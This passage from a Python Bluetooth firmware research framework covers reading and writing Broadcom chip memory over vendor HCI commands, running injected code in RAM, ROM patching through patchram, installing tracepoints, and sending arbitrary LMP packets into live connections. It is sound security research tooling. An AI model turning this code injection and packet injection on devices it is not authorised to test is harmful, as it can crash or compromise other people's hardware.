"TRACEPOINT_HOOK_SIZE",
]:
if const not in dir(self.fw):
self.logger.warning(
"addTracepoint: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return False
# FIXME: Currently only works for aligned addresses
if address % 4 != 0:
self.logger.warning("Only tracepoints at aligned addresses are allowed!")
return False
# Check if tracepoint exists
existing_hook_addresses = []
for tp_address, tp_hook_address in self.tracepoints:
existing_hook_addresses.append(tp_hook_address)
if tp_address == address:
self.logger.warning("Tracepoint at 0x%x does already exist!" % address)
return False
# we only have room for 0x90/28 = 5 tracepoints
if len(self.tracepoints) >= 5:
self.logger.warning("Already using the maximum of 5 tracepoints")
return False
# Find a free address for the hook code
for i in range(5):
hook_address = (
self.fw.TRACEPOINT_HOOKS_LOCATION + self.fw.TRACEPOINT_HOOK_SIZE * i
)
if hook_address not in existing_hook_addresses:
break
# Check if this is the first tracepoint
if self._tracepointHciCallbackFunction not in self.registeredHciCallbacks:
self.logger.info("Initial tracepoint: setting up tracepoint engine.")
# compile assembler snippet containing the hook body code:
hooks_code = asm(
self.fw.TRACEPOINT_BODY_ASM_SNIPPET,
vma=self.fw.TRACEPOINT_BODY_ASM_LOCATION,
arch="thumb",
)
if len(hooks_code) > 0x100:
self.logger.error(
"Assertion failed: len(hooks_code)=%d is larger than 0x100!"
% len(hooks_code)
)
# save memory content at the addresses where we place the snippet and the stage-1 hooks
self.tracepoint_saved_data = self.readMem(
self.fw.TRACEPOINT_BODY_ASM_LOCATION, 0x100
)
# write code for hook to memory
self.writeMem(self.fw.TRACEPOINT_BODY_ASM_LOCATION, hooks_code)
# Register tracepoint hci callback function
self.registerHciCallback(self._tracepointHciCallbackFunction)
# Add tracepoint to list
self.tracepoints.append((address, hook_address))
### Injecting stage-1 hooks ###
# save the 4 bytes at which the hook branch (e.g. b <hook address>) will be placed
saved_instructions = self.readMem(address, 4)
# we need to know the patchram slot in advance..
# little trick/hack: we just insert a patch now with the original data to
# receive the slot value. later we insert the actual patch which will reuse
# the same slot.
# FIXME: To increase performance, try to not do it like that ^^
self.patchRom(address, saved_instructions)
table_addresses, _, _ = self.getPatchramState()
patchram_slot = table_addresses.index(address)
self.logger.info("Using patchram slot %d for tracepoint." % patchram_slot)
self.disableRomPatch(
address
) # Eval board requires to delete patch before installing it again
# compile assembler snippet containing the stage-1 hook code:
stage1_hook_code = asm(
self.fw.TRACEPOINT_HOOK_ASM
% (address, patchram_slot, self.fw.TRACEPOINT_BODY_ASM_LOCATION, address),
vma=hook_address,
arch="thumb",
)
if len(stage1_hook_code) > self.fw.TRACEPOINT_HOOK_SIZE:
self.logger.error(
"Assertion failed: len(stage1_hook_code)=%d is larger than TRACEPOINT_HOOK_SIZE!"
% len(stage1_hook_code)
)
return False
# write code for hook to memory
self.logger.debug("addTracepoint: injecting hook function...")
self.writeMem(hook_address, stage1_hook_code)
# patch in the hook branch instruction
patch = asm("b 0x%x" % hook_address, vma=address, arch="thumb")
if not self.patchRom(address, patch):
self.logger.warning("addTracepoint: couldn't insert tracepoint hook!")
return False
self.logger.debug(
"addTracepoint: Placed Tracepoint at 0x%08x (hook at 0x%x)."
% (address, hook_address)
)
return True
def deleteTracepoint(self, address):
# type: (Address) -> bool
if not self.check_running():
return False
# find tracepoint in the list
for tp in self.tracepoints:
if tp[0] == address:
# disable patchram slot for the tracepoint
self.disableRomPatch(tp[0])
# remove tracepoint from self.tracepoints
self.tracepoints.remove(tp)
break
else:
self.logger.warning("deleteTracepoint: No tracepoint at address: 0x%x" % address)
return False
return True
def check_running(self):
# type: () -> bool
"""
Check if the framework is running (i.e. the sockets are connected,
the recv and send threads are running and exit_requested is not True)
"""
if self.exit_requested:
self.shutdown()
if not self.running:
self.logger.warning("Not running. call connect() first!")
return False
return True
@abstractmethod
def device_list(self):
# type: () -> List[DeviceTuple]
pass
def connect(self):
# type: () -> bool
if self.exit_requested:
self.shutdown()
if self.running:
self.logger.warning("Already running. call shutdown() first!")
return False
if not self.interface:
self.logger.warning("No adb device identifier is set")
return False
if not self.local_connect():
return False
self.logger.info(f"Connected to {self.interface}")
# start receive thread
self.recvThread = Thread(target=self._recvThreadFunc)
self.recvThread.setDaemon(True)
self.recvThread.start()
# start send thread
self.sendThread = Thread(target=self._sendThreadFunc)
self.sendThread.setDaemon(True)
self.sendThread.start()
# register stackDumpReceiver callback:
self.stackDumpReceiver = hci.StackDumpReceiver()
# register hci callback:
self.registerHciCallback(self.stackDumpReceiver.recvPacket)
if not self.initialize_fimware():
self.logger.warning("connect: Failed to initialize firmware!")
return False
self.running = True
return True
@abstractmethod
def local_connect(self):
return True
def initialize_fimware(self):
# type: () -> bool
"""
Checks if we are running on a Broadcom chip and loads available firmware information based
on LMP subversion.
"""
# send Read_Local_Version_Information
version = self.sendHciCommand(
HCI_COMND.Read_Local_Version_Information, "".encode("utf-8")
)
if not version or len(version) < 11:
self.logger.warning(
"""initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
Android device. bluetooth.default.so must contain the string 'hci_inject'.
hci: You might have insufficient permissions to send this type of command."""
)
return False
# Broadcom uses 0x000f as vendor ID, Cypress 0x0131
vendor = (version[9] << 8) + version[8]
if vendor != 0xF and vendor != 0x131:
self.logger.critical("Not running on a Broadcom or Cypress chip!")
return False
else:
subversion = (version[11] << 8) + version[10]
iOS = False
if self.__class__.__name__ == "iOSCore":
iOS = True
self.fw = Firmware(subversion, iOS).firmware
# Safe to turn diagnostic logging on, it just gets a timeout if the Android
# driver was recompiled with other flags but without applying a proper patch.
self.logger.info("Try to enable debugging on H4 (warning if not supported)...")
self.enableBroadcomDiagnosticLogging(True)
return True
def shutdown(self):
# type: () -> None
"""
Shutdown the framework by stopping the send and recv threads. Socket shutdown
also terminates port forwarding if adb is used.
"""
# Setting exit_requested to True will stop the send and recv threads at their
# next while loop iteration
self.exit_requested = True
# unregister stackDumpReceiver callback:
if self.stackDumpReceiver is not None:
self.stackDumpReceiver = None
# unregister stackDumpReceiver callback:
if self.stackDumpReceiver is not None:
self.unregisterHciCallback(self.stackDumpReceiver.recvPacket)
# Wait until both threads have actually finished
self.recvThread.join()
self.sendThread.join()
# Disconnect the TCP sockets
self._teardownSockets()
if self.write_btsnooplog:
self.btsnooplog_file.close()
self.running = False
self.exit_requested = False
self.logger.info("Shutdown complete.")
def registerHciCallback(self, callback):
# type: (Callable[[Record], None ]) -> None
"""
Add a new callback function to self.registeredHciCallbacks.
The function will be called every time the recvThread receives
a HCI packet. The packet will be passed to the callback function
as first argument. The format is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
"""
if callback in self.registeredHciCallbacks:
self.logger.warning("registerHciCallback: callback already registered!")
return
self.registeredHciCallbacks.append(callback)
def unregisterHciCallback(self, callback):
# type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
"""
Remove a callback function from self.registeredHciCallbacks.
"""
if callback in self.registeredHciCallbacks:
self.registeredHciCallbacks.remove(callback)
return
self.logger.warning("registerHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
# type: (queue2k.Queue[Record], FilterFunction) -> None
"""
Add a new queue to self.registeredHciRecvQueues.
The queue will be filled by the recvThread every time the thread receives
a HCI packet. The format of the packet is a tuple containing:
- HCI packet (subclass of HCI, see hci.py)
- original length
- inc_len
- flags
- drops
- timestamp (python datetime object)
If filter_function is not None, the tuple will first be passed
to the function and only if the function returns True, the packet
is put into the queue.
"""
if queue in self.registeredHciRecvQueues:
self.logger.warning("registerHciRecvQueue: queue already registered!")
return
self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
# type: (queue2k.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
"""
Remove a queue from self.registeredHciRecvQueues.
"""
for entry in self.registeredHciRecvQueues:
if entry[0] == queue:
self.registeredHciRecvQueues.remove(entry)
return
self.logger.warning("registerHciRecvQueue: no such queue is registered!")
def sendHciCommand(
self, hci_opcode: HCI_COMND, data: bytes, timeout: int = 3
) -> Optional[bytearray]:
"""
Send an arbitrary HCI command packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
or the timeout expires. The return value is the Payload of the
HCI Command Complete Event which was received in response to
the command or None if no response was received within the timeout.
"""
# Support legacy code that passes an integer instead of a HCI_COMND for now
# This would be more elegant with a
# flag that can be set to allow arbitrary bytes for the HCI command but that would require literal types
# (PEP586) which are only supported with python 3.8+
# For static type analysis this is good enough, because if someone hardcodes some hci command they might as well document it
if isinstance(hci_opcode, HCI_COMND):
opcode = hci_opcode.value
elif isinstance(hci_opcode, int):
opcode = hci_opcode
else:
raise ValueError(
"opcode parameter to sendHciCommand must be either integer or HCI_COMND enum member"
)
# TODO: If the response is a HCI Command Status Event, we will actually
# return this instead of the Command Complete Event (which will
# follow later and will be ignored). This should be fixed..
queue = queue2k.Queue(1)
# standard HCI command structure
payload = p16(opcode) + p8(len(data)) + data
# define a filter function which recognizes the response (command complete
# or command status event).
def recvFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
self.logger.debug("sendHciCommand.recvFilterFunction: got response")
# Interpret HCI event
if isinstance(hcipkt, hci.HCI_Event):
if hcipkt.event_code == 0x0E: # Cmd Complete event
if u16(hcipkt.data[1:3]) == opcode:
return True
if hcipkt.event_code == 0x0F: # Cmd Status event
if u16(hcipkt.data[2:4]) == opcode:
return True
return False
try:
self.sendQueue.put(
(hci.HCI.HCI_CMD, payload, queue, recvFilterFunction), timeout=timeout
)
ret = queue.get(timeout=timeout)
return ret
except queue2k.Empty:
self.logger.warning("sendHciCommand: waiting for response timed out!")
# If there was no response because the Trace Replay Hook throw an assert it will be in this attribute.
# Raise this so the main thread doesn't ignore this and it will be caught by any testing framework
if hasattr(self, "test_failed"):
raise self.test_failed
return None
except queue2k.Full:
self.logger.warning("sendHciCommand: send queue is full!")
return None
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
need to receive a response, register an hciRecvQueue or -callback.
The return value is True if the send-task could be put inside the
queue and False if it was not possible within the timeout.
"""
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except queue2k.Full:
self.logger.warning("sendH4: send queue is full!")
return False
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
from the sendThread or any other thread and respectively chooses
either the sendThreadrecvQueue or the recvQueue. (FIXME: no it does not?!)
The recvQueue is filled by the recvThread. If the queue fills up
the recvThread empties the queue (unprocessed packets are lost).
The recvPacket function is meant to receive raw HCI packets in
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
self.logger.debug("recvPacket: called")
if not self.check_running():
return None
try:
return self.recvQueue.get(timeout=timeout)
except queue2k.Empty:
return None
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
"""
Reads <length> bytes from the memory space of the firmware at the given
address. Reading from unmapped memory or certain memory-mapped-IO areas
which need aligned access crashes the chip.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the read.
- bytes_done: Number of bytes that have already been read with earlier calls to
readMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be read within the transaction covered by progress_log.
"""
self.logger.debug("readMem: reading at 0x%x" % address)
if not self.check_running():
return None
read_addr = address # read_addr is the address of the next Read_RAM HCI command
byte_counter = 0 # tracks the number of received bytes
outbuffer = (
bytearray()
) # buffer which stores all accumulated data read from the chip
if bytes_total == 0: # If no total bytes where given just use length
bytes_total = length
retry = 3 # Retry on failures
while (
read_addr < address + length
): # Send HCI Read_RAM commands until all data is received
# Send hci frame
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 251: # The max. size of a Read_RAM payload is 251
blocksize = 251
# Send Read_RAM (0xfc4d) command
response = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if response is None or not response:
self.logger.warning(
"readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)"
% (read_addr, length)
)
# Retry once...
if retry > 0:
self.logger.debug("readMem: retrying once...")
retry = retry - 1
continue
else:
self.logger.warning("readMem: failed!")
return None
data = response[4:] # start of the actual data is at offset 4
if len(data) == 0: # this happens i.e. if not called on a brcm chip
self.logger.warning("readMem: empty response, quitting...")
break
if len(data) != blocksize:
self.logger.debug("readMem: insufficient bytes returned, retrying...")
continue
status = response[3]
if status != 0:
# It is not yet reverse engineered what this byte means. For almost
# all memory addresses it will be 0. But for some it will be different,
# EDIT: response should be a command complete event (event code 0x0e). The 4 byte (response[3]) indicates the hci error code
# 0x00 (0) means everything okay
# 0x12 means Command Disallowed
# e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12
self.logger.warning(
"readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x"
% (status, read_addr)
)
break
# do double checking, but prevent loop
if self.doublecheck and retry > 0:
response_check = self.sendHciCommand(
HCI_COMND.VSC_Read_RAM, p32(read_addr) + p8(blocksize)
)
if response != response_check:
self.logger.debug(
"readMem: double checking response failed at 0x%x! retry..."
% read_addr
)
time.sleep(0.3)
retry = retry - 1
continue
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
retry = 3 # this round worked, so we re-enable retries
return outbuffer
@needs_pwnlib
def readMemAligned(
self, address, length, progress_log=None, bytes_done=0, bytes_total=0
):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
section at 0x310000 (patchram) and possibly other sections as well.
The arguments are equivalent to readMem() except that the address and length
have to be 4-byte aligned.
The current implementation works like this (and obviously can be improved!):
- Work in chunks of max. 244 bytes (restricted by max. size of HCI event)
- For each chunk do:
- Write a code snippet to the firmware which copies the chunk of memory
into a custom HCI Event and sends it to the host (this uses aligned
ldr and str instructions)
- Register a hciCallbackFunction for receiving the custom event
"""
# Check if constants are defined in fw.py
for const in ["READ_MEM_ALIGNED_ASM_LOCATION", "READ_MEM_ALIGNED_ASM_SNIPPET"]:
if const not in dir(self.fw):
self.logger.warning(
"readMemAligned: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return None
# Force length to be multiple of 4 (needed for strict alignment)
if length % 4 != 0:
self.logger.warning("readMemAligned: length (0x%x) must be multiple of 4!" % length)
return None
# Force address to be multiple of 4 (needed for strict alignment)
if address % 4 != 0:
self.logger.warning("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
if hcipkt.event_code != 0xFF:
return False
if hcipkt.data[0:4] != bytes("READ", "utf-8"):
return False
return True
self.registerHciRecvQueue(recvQueue, hciFilterFunction)
read_addr = address
byte_counter = 0
outbuffer = (
bytearray()
)
if bytes_total == 0:
bytes_total = length
while read_addr < address + length:
bytes_left = length - byte_counter
blocksize = bytes_left
if blocksize > 244:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(
self.fw.READ_MEM_ALIGNED_ASM_SNIPPET
% (blocksize, read_addr, old_div(blocksize, 4)),
vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION,
arch="thumb",
)
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
# on iOSCore the return value might be wrong
if self.doublecheck:
self.logger.debug("readMemAligned: probably failed, but continuing...")
else:
self.logger.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except queue2k.Empty:
self.logger.warning("readMemAligned: No response from assembler snippet.")
return None
hcipkt = record[0]
data = hcipkt.data[4:]
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (
bytes_done + byte_counter,
bytes_total,
old_div((bytes_done + byte_counter) * 100, bytes_total),
)
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
Optional arguments for progress logs:
- progress_log: An instance of log.progress() which will be updated during the write.
- bytes_done: Number of bytes that have already been written with earlier calls to
writeMem() and belonging to the same transaction which is covered by progress_log.
- bytes_total: Total bytes that will be written within the transaction covered by progress_log.
"""
self.logger.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
write_addr = address
byte_counter = 0
if bytes_total == 0:
bytes_total = len(data)
while byte_counter < len(data):
# Send hci frame
bytes_left = len(data) - byte_counter
blocksize = bytes_left
if blocksize > 251:
blocksize = 251
response = self.sendHciCommand(
HCI_COMND.VSC_Write_RAM,
p32(write_addr) + data[byte_counter: byte_counter + blocksize],
)
if response is None:
self.logger.warning(
"writeMem: Timeout while reading response, probably need to wait longer."
)
return False
elif response[3] != 0:
self.logger.warning(
"writeMem: Got error code %d in command complete event."
% response[3]
)
return False
write_addr += blocksize
byte_counter += blocksize
if progress_log is not None:
msg = "sending data... %d / %d Bytes" % (
bytes_done + byte_counter,
bytes_total,
)
progress_log.status(msg)
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the self.context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be resetted by Android) if the function takes too long.
"""
response = self.sendHciCommand(HCI_COMND.VSC_Launch_RAM, p32(address))
if response is None:
self.logger.warning(
"Empty HCI response during launchRam, driver crashed due to invalid code or destination"
)
return False
error_code = response[3]
if error_code != 0:
self.logger.warning("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if "LAUNCH_RAM_PAUSE" in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
self.logger.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Union[bool, Tuple[List[Optional[int]], List[Union[Union[int, bytes, None], Any]], list]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
- target_addresses: The address which is patched by this slot (or None)
- new_values: The new (patch) value (or None)
- enabled_bitmap: 1 if the slot is active, 0 if not (integer)
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
"PATCHRAM_ALIGNED",
]:
if const not in dir(self.fw):
self.logger.warning(
"getPatchramState: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMemAligned(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
else:
slot_dump = self.readMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count, 4)
)
table_addr_dump = self.readMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count * 4
)
table_val_dump = self.readMem(
self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count * 4
)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(old_div(slot_count, 32)):
slot_dwords.append(slot_dump[dword * 32: (dword + 1) * 32])
for dword in slot_dwords:
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i * 4: i * 4 + 4]) << 2)
table_values.append(table_val_dump[i * 4: i * 4 + 4])
else:
table_addresses.append(None)
table_values.append(None)
return (table_addresses, table_values, slot_bits)
def patchRom(self, address, patch, slot=None):
# type: (Address, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
slots for patches and patchRom() will automatically find the next free
slot if it is not forced through the 'slot' argument (see also
getPatchramState()).
address: The address at which the patch should be applied
(if the address is not 4-byte aligned, the patch will be splitted into two slots)
patch: The new value which should be placed at the address (byte string of length 4)
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
"PATCHRAM_VALUE_TABLE_ADDRESS",
"PATCHRAM_NUMBER_OF_SLOTS",
]:
if const not in dir(self.fw):
self.logger.warning("patchRom: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
if len(patch) != 4:
self.logger.warning("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
self.logger.debug(
"patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address)
)
alignment = address % 4
if alignment != 0:
self.logger.debug("patchRom: Address 0x%x is not 4-byte aligned!" % address)
if slot is not None:
self.logger.warning(
"patchRom: Patch must be splitted into two slots, but fixed slot value was enforced. Do nothing!"
)
return False
self.logger.debug("patchRom: applying patch 0x%x in two rounds" % u32(patch))
# read original content
orig = self.readMem(address - alignment, 8)
# patch the difference of the 4 bytes we want to patch within the original 8 bytes
self.patchRom(
address - alignment, orig[:alignment] + patch[: 4 - alignment], slot
)
self.patchRom(
address - alignment + 4,
patch[4 - alignment:] + orig[alignment + 4:],
slot,
)
return True
table_addresses, table_values, table_slots = self.getPatchramState()
# Check whether the address is already patched:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
self.logger.info(
"patchRom: Reusing slot for address 0x%x: %d" % (address, slot)
)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
return True
if slot is None:
# Find free slot:
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] is None:
slot = i
self.logger.info("patchRom: Choosing next free slot: %d" % slot)
break
if slot is None:
self.logger.warning("patchRom: All slots are in use!")
return False
else:
if table_values[slot] == 1:
self.logger.warning("patchRom: Slot %d is already in use. Overwriting..." % slot)
# Write new value to patchram value table at 0xd0000
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot * 4, patch)
# Write address to patchram target table at 0x310000
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(address >> 2)
)
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(
table_slots[target_dword * 32: (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
return True
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
the slot number directly (the address will be ignored in this case).
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"PATCHRAM_TARGET_TABLE_ADDRESS",
"PATCHRAM_ENABLED_BITMAP_ADDRESS",
]:
if const not in dir(self.fw):
self.logger.warning(
"disableRomPatch: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
table_addresses, table_values, table_slots = self.getPatchramState()
if slot is None:
if address is None:
self.logger.warning("disableRomPatch: address is None.")
return False
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
self.logger.info("Slot for address 0x%x is: %d" % (address, slot))
break
if slot is None:
self.logger.warning("No slot contains address: 0x%x" % address)
return False
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(
table_slots[target_dword * 32: (target_dword + 1) * 32][::-1]
)[::-1]
self.writeMem(
self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword * 4, slot_dword
)
# Write 0xFFFFC to patchram target table at 0x310000
# (0xFFFFC seems to be the default value if the slot is inactive)
self.writeMem(
self.fw.PATCHRAM_TARGET_TABLE_ADDRESS + slot * 4, p32(0xFFFFC >> 2)
)
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
The connection number starts counting at 1 and is stored in the first
field of the connection structure.
The connection index starts at 0 and is the index into the connection
table (table containing all connection structs).
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
# Check if constants are defined in fw.py
# Do we have an array implementation?
is_array = True
for const in [
"CONNECTION_MAX",
"CONNECTION_ARRAY_ADDRESS",
"CONNECTION_STRUCT_LENGTH",
]:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ["CONNECTION_LIST_ADDRESS"]:
if const not in dir(self.fw):
self.logger.warning(
"readConnectionInformation: neither CONNECTION_LIST nor CONNECTION_ARRAY in fw.py. FEATURE NOT SUPPORTED!"
)
return None
if conn_number < 1 or conn_number > self.fw.CONNECTION_MAX:
self.logger.warning(
"readConnectionInformation: connection number out of bounds: %d"
% conn_number
)
return None
if is_array:
connection = self.readMem(
Address(
self.fw.CONNECTION_ARRAY_ADDRESS
+ self.fw.CONNECTION_STRUCT_LENGTH * (conn_number - 1)
),
self.fw.CONNECTION_STRUCT_LENGTH,
)
else:
connection_memaddr = Address(
u32(
self.readMem(
Address(
self.fw.CONNECTION_LIST_ADDRESS + 4 * (conn_number - 1)
),
4,
)
)
)
if connection_memaddr == 0x00000000:
return None
connection = self.readMem(
connection_memaddr, self.fw.CONNECTION_STRUCT_LENGTH
)
if connection == b"\x00" * self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(
self, opcode, payload="", is_master=True, conn_handle=0x0C, extended_op=False
):
# type: (Opcode, bytes, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This code is using the vendor specific HCI command 0xfc58, which sends
an LMP PDU. Note that Broadcom firmware internally checks opcodes and
lengths, meaning that despite returning success long payloads will be
cut and invalid opcodes might be discarded.
is_master: Determines if we are master or slave within the connection.
conn_handle: The connection handle specifying the connection into which the
packet will be injected. By default, the first connection handle
used by Broadcom is 0x0c.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Can be empty.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
self.logger.warning("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# must be string...
if payload is None:
payload = b""
if ((not extended_op) and opcode > (0xFF >> 1)) or (
extended_op and opcode > 0xFF
):
self.logger.warning("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = (
p8(opcode << 1 | (not is_master))
if not extended_op
else p8(0x7F << 1 | (not is_master)) + p8(opcode)
)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaulation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + b"\x00" * (17 - len(opcode_data) - len(payload))
if len(data) > 17:
self.logger.warning(
"sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content."
)
# self.logger.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(
HCI_COMND.VSC_SendLmpPdu,
p16(conn_handle) + p8(len(payload + opcode_data)) + data,
)
if result is None:
self.logger.warning(
"sendLmpPacket: did not get a result from firmware, maybe crashed internally?"
)
return False
else:
error_status = result[3]
if error_status != 0:
self.logger.warning("sendLmpPacket: got error status 0x%02x" % error_status)
return False
return True
@needs_pwnlib
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
Basically, this ignores LM_LmpInfoTable and LM_LmpInfoTableEsc4 contents, but
only via sendLmp HCI and not during normal Link Manager operation.
"""
# Check if constants are defined in fw.py
for const in [
"FUZZLMP_CODE_BASE_ADDRESS",
